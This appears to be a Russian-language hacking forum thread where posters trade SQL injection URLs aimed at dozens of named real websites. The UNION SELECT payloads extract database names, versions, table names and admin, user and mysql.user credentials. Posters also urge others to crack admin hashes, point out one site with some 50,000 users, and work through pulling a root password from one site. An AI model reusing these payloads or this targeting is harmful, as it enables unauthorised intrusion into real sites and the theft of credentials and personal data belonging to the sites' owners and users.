__http://www.jorin.ru/content.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/* __http://www.westauto.ru/news.php?news=yes&newsid=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*
Смотрим имена таблиц: __http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+limit+16,1/* Пароль и логин админа: __http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13+from+admin/*
Моя первая http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
http://www.flugzeugbilder.de/show.php?id=-588342+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/* http://www.cybwarrior.com/download/show.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+forum/* http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,Password,6,7,8+from+admin/* http://www.a1k.it/downloads.php?cat=-9+union+select+1,concat(username,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1/* http://www.davidyassky.com/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9/* http://www.cut-up.com/news/issues.php?issue=-13+union+select+1,2,3,4,VERSION()/* http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/* http://www.davealbo.com/issues.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11/* http://www.lccp.org/issues.php?ID=-6+union+select+1,2,3,4,password,6,7,8+from+users/* http://tell-me-more.org/issues.php?ID=-21+union+select+1,2,3,4,5,6,7,8/* http://www.ekipirovka.ru/issues.php?id=-47+union+select+1,2,3/* http://www.cmslaw.com/current-issues.php?id=-3+union+select+1,2,3,4,5,6,7/*
__http://www.runiga.com/ruso/home.php?pageid=190&id=-1+union+select+1,2,3,concat(login,char(58),email),5,6,7,8,9+from+users/*
http://www.mtas.ru/second.php?ID=15%20UNION%20SELECT%20null/* http://www.flirtanica.ru/articles1.php?id=-1%20UNION%20SELECT%201,version(),3,4,user()/*
Code: http://www.fullboost.com.au/news.php?newsId=-179%20union%20select%201,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,version(),9,10,11/*
Code: http://www.pitermag.ru/labels.php?do=ViewBrand&id=-1+union+select+1,database(),3,4,5,6,7/* если было, сорри Code: http://rpg.gameforums.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,0x3a),8,9,10,11,12,13+from+users+limit+1,1/* там 50к юзеров вроде как, дерзайте upd: Code: http://www.bonsk.ru/seminars.php?id=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17/* Code: http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15/* сайты взаимосвязаны.. копаться не стал, т.к. ничего явного не нашел, а пинг до сайтов большой =\ 15.22pm upd2: Code: http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18/* копаться также не стал, убегаю
2n1†R0x http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,concat(username,char(58),user_password,char(58),user_email,char(58),user_icq),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users/* ну вот например таблица юзеров, можно админский хеш попробовать раcшивровать. http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,concat(email,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+members+limit+0,1/* и перебираем,пасс в чистом виде
__http://www.herb4all.ru/index.php?group=1000+union+select+1,version(),3/* __http://www.mp2.ru/?p_id=-1+union+select+1,version(),concat(database(),char(58),user())/* __http://www.japanfish.ru/index.php?razdel=-1+union+select+1,2,3/*
_http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* Надеюсь у кого нибудь получиться доломать до пасса админа =)
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user+limit+45/* user:root а дальше пасса чето не могу найти)))
Я не знаю, как можно достучаться до пасса админа, не имея скуля. Сайт выдает ошибку при любом значении id.. Мдя, ничего не понимаю. При запросе Code: http://www.keckobservatory.org/article.php?id=-99+union+select+111,2,3,4,5,6,7,8+from+mysql.user Сайт выдает принтабельной колонку 1. (html код => printer_friendly_without.php?id=111) При запросе Code: http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user Проявляется printer_friendly_without.php?id=root Но при запросах Code: http://www.keckobservatory.org/article.php?id=-99+union+select+user,2,3,4,5,6,7,8+from+mysql.user и Code: http://www.keckobservatory.org/article.php?id=-99+union+select+password,2,3,4,5,6,7,8+from+mysql.user printer_friendly_without.php?id= остается пустым